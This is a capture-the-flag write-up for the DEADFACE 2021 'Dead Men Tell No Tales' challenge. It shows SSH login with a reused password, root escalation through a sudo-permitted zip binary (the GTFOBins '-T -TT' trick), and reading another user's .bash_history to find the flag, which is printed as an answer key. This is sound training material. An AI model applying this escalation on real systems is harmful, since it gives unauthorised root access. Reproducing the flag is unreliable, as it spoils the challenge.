# Dead Men Tell No Tales
 

## Details

>We've discovered a remote system used by DEADFACE. We're not sure what the password is, but we know Donnell Aulner has an account on that machine. We believe DEADFACE has stored valuable information on this machine. The flag exists on the machine in the format flag{some-text-here}. Submit the flag as flag{flag-goes-here}.
>
>Username: dracula
>
>deadmen.deadface.io:22
---

There is no password given in this challenge, but we do have a password which `dracula` used previosuly from another challenge [link here]()

Using that password we can access the shell.

Once logged in we have a look around but can see any obvious files. So next we run `sudo -l`

```bash
dracula@c0d89345e437:~$ sudo -l
Matching Defaults entries for dracula on c0d89345e437:
env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User dracula may run the following commands on c0d89345e437:
(ALL) NOPASSWD: /usr/bin/zip
```

We can take advantage of a Priv Esc availble in the zip executable as detailed [here](https://gtfobins.github.io/gtfobins/zip/).

```bash
$ TF=$(mktemp -u)
$ sudo /usr/bin/zip $TF /etc/hosts -T -TT 'sh #'
adding: etc/hosts (deflated 34%)
# whoami
root
```

Now that we're root, lets look as what files are in the home directories.

```bash
# ls -alR /home
/home:
total 28
drwxr-xr-x 1 root root 4096 Sep 19 01:37 .
drwxr-xr-x 1 root root 4096 Oct 19 15:30 ..
drwxr-xr-x 2 d34th d34th 4096 Sep 19 01:37 d34th
drwxr-xr-x 1 dracula dracula 4096 Sep 19 01:44 dracula
drwxr-xr-x 1 spookyboi spookyboi 4096 Sep 19 01:39 spookyboi

/home/d34th:
total 24
drwxr-xr-x 2 d34th d34th 4096 Sep 19 01:37 .
drwxr-xr-x 1 root root 4096 Sep 19 01:37 ..
-rw-r--r-- 1 d34th d34th 220 Sep 19 01:37 .bash_logout
-rw-r--r-- 1 d34th d34th 3771 Sep 19 01:37 .bashrc
-rw-r--r-- 1 d34th d34th 807 Sep 19 01:37 .profile

/home/dracula:
total 36
drwxr-xr-x 1 dracula dracula 4096 Sep 19 01:44 .
drwxr-xr-x 1 root root 4096 Sep 19 01:37 ..
-rw------- 1 dracula dracula 1 Sep 19 01:45 .bash_history
-rw-r--r-- 1 dracula dracula 220 Sep 19 01:37 .bash_logout
-rw-r--r-- 1 dracula dracula 3771 Sep 19 01:37 .bashrc
drwxrwxr-x 3 dracula dracula 4096 Sep 19 01:44 .local
-rw-r--r-- 1 dracula dracula 807 Sep 19 01:37 .profile

/home/dracula/.local:
total 16
drwxrwxr-x 3 dracula dracula 4096 Sep 19 01:44 .
drwxr-xr-x 1 dracula dracula 4096 Sep 19 01:44 ..
drwx------ 3 dracula dracula 4096 Sep 19 01:44 share

/home/dracula/.local/share:
total 12
drwx------ 3 dracula dracula 4096 Sep 19 01:44 .
drwxrwxr-x 3 dracula dracula 4096 Sep 19 01:44 ..
drwx------ 2 dracula dracula 4096 Sep 19 01:44 nano

/home/dracula/.local/share/nano:
total 8
drwx------ 2 dracula dracula 4096 Sep 19 01:44 .
drwx------ 3 dracula dracula 4096 Sep 19 01:44 ..

/home/spookyboi:
total 28
drwxr-xr-x 1 spookyboi spookyboi 4096 Sep 19 01:39 .
drwxr-xr-x 1 root root 4096 Sep 19 01:37 ..
-rw------- 1 spookyboi spookyboi 93 Sep 19 01:39 .bash_history
-rw-r--r-- 1 spookyboi spookyboi 220 Sep 19 01:37 .bash_logout
-rw-r--r-- 1 spookyboi spookyboi 3771 Sep 19 01:37 .bashrc
-rw-r--r-- 1 spookyboi spookyboi 807 Sep 19 01:37 .profile
```
There's not a lot, but there are some hidden files in spookyboi's home folder.

Lets take a look at his `.bash_history`

```bash
# cat /home/spookyboi/.bash_history
cd ~
echo "flag{c4c089cdbe222b9360880a07c987b581c6f51609}" > flag.txt
rm flag.txt
exit
exit
#

```
And there's our flag!

## flag{c4c089cdbe222b9360880a07c987b581c6f51609}

Original writeup (https://github.com/CTSecUK/DEADFACE_CTF_2021/blob/main/Write-ups/Exploitation/Dead%20Men%20Tell%20No%20Tales%20(400%20Points).md).